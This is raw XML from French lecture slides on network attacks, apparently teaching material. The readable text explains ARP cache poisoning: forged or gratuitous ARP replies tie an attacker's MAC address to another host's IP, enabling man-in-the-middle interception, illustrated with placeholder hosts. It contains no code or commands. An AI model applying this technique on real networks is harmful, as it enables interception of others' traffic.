                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>fff:ffff:ffff</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="fr-FR" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="120" name="Rectangle 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6334510" y="932208"/>
            <a:ext cx="734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sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>fff:ffff:ffff</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="fr-FR" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="223635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9"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="10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childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="24" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="with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fade">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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83"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="83"/>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fade">
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="119"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="35" presetID="10" presetClass="exit" presetSubtype="0" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="103"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="103"/>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120"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="40"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103" grpId="0"/>
      <p:bldP spid="109" grpId="0"/>
      <p:bldP spid="113" grpId="0"/>
      <p:bldP spid="119" grpId="0"/>
      <p:bldP spid="1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attaques réseaux</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289560" y="805752"/>
            <a:ext cx="11178540" cy="5884607"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ARP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>poisonning</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="4000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1900" dirty="0"/>
              <a:t>L'attaque d'empoisonnement du cache ARP est une attaque courante contre le protocole ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1900" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1900" dirty="0"/>
              <a:t>En utilisant une telle attaque, les attaquants peuvent tromper la victime en lui faisant accepter des mappages IP vers MAC falsifiés. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1900" dirty="0"/>
              <a:t>Cela peut entraîner la redirection des paquets de la victime vers l'ordinateur avec l'adresse MAC falsifiée, entraînant des attaques potentielles de l'homme du </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1900" dirty="0" smtClean="0"/>
              <a:t>milieu.</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1900" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>Principe:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Une </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>machine se fait passer pour une autre au niveau physique (dans le même LAN) </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Empoisonner </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>le cache ARP de la cible </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Associer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>l’@ MAC du pirate à l’@ IP d’une autre </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>Méthodes </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Émission </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>d'une réponse ARP sans requête </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>préalable (Arp Gratuit) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Émission </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>d'une requête ARP forgée </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>(Arp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>reply</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>MSG </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>ARP: @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> = machine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>spoofée</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>, @MAC=pirate</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46</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11020024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Attaques réseaux</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47</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 5" descr="C:\Users\Abdou\AppData\Local\Microsoft\Windows\INetCache\Content.Word\switch-por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6843" y="3689044"/>
            <a:ext cx="884431" cy="334214"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Groupe 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1074322" y="3470475"/>
            <a:ext cx="773743" cy="773743"/>
            <a:chOff x="17736" y="536836"/>
            <a:chExt cx="457350" cy="457363"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="14" name="Image 13"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="17736" y="536836"/>
              <a:ext cx="457350" cy="457363"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Zone de texte 32"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="180000" y="600317"/>
              <a:ext cx="229870" cy="2286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900" dirty="0">
                  <a:effectLst/>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>A</a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR" sz="1200" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Groupe 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9881265" y="3471477"/>
            <a:ext cx="773743" cy="772668"/>
            <a:chOff x="5021631" y="637128"/>
            <a:chExt cx="457200" cy="457200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="12" name="Image 11"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5021631" y="637128"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Zone de texte 32"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5203339" y="689954"/>
              <a:ext cx="229870" cy="22796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900">
                  <a:effectLst/>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>B</a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR" sz="1200">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Groupe 8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5203699" y="1968361"/>
            <a:ext cx="792011" cy="811355"/>
            <a:chOff x="2061351" y="238056"/>
            <a:chExt cx="479671" cy="479714"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="10" name="Image 9" descr="C:\Users\Abdou\Desktop\icons\pc-hack.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1351" y="238056"/>
              <a:ext cx="479671" cy="479714"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Zone de texte 32"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2225317" y="298673"/>
              <a:ext cx="229870" cy="2286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1200" dirty="0">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>C</a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR" sz="1200" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="17" name="Tableau 16"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1390824204"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="71919" y="4434593"/>
          <a:ext cx="2798894" cy="928488"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{073A0DAA-6AF3-43AB-8588-CEC1D06C72B9}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="995673"/>
                <a:gridCol w="1803221"/>
              </a:tblGrid>
              <a:tr h="309496">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
                        <a:t>Hote</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> A</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="309496">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>MAC</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
                        <a:t>aaaa:aaaa:aaaa</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="309496">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>IP</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>192.168.1.1</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="18" name="Tableau 17"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="951885096"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="9111723" y="4398381"/>
          <a:ext cx="2798894" cy="928488"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{073A0DAA-6AF3-43AB-8588-CEC1D06C72B9}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="995673"/>
                <a:gridCol w="1803221"/>
              </a:tblGrid>
              <a:tr h="309496">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
                        <a:t>Hote</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> B</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="309496">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>MAC</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
                        <a:t>bbbb:bbbb:bbbb</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="309496">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>IP</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>192.168.1.2</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="Connecteur droit 20"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="6" idx="0"/>
            <a:endCxn id="10" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5599059" y="2779716"/>
            <a:ext cx="646" cy="909328"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="22" name="Connecteur droit 21"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="12" idx="1"/>
            <a:endCxn id="6" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6041274" y="3856151"/>
            <a:ext cx="3839991" cy="1660"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25" name="Connecteur droit 24"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="14" idx="3"/>
            <a:endCxn id="6" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1848065" y="3856151"/>
            <a:ext cx="3308778" cy="1196"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Rectangle 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="118291" y="805753"/>
            <a:ext cx="2816797" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ARP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>poisonning</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="29" name="Connecteur en angle 28"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="1848065" y="2804805"/>
            <a:ext cx="3465966" cy="830652"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 200"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="accent2"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent2"/>
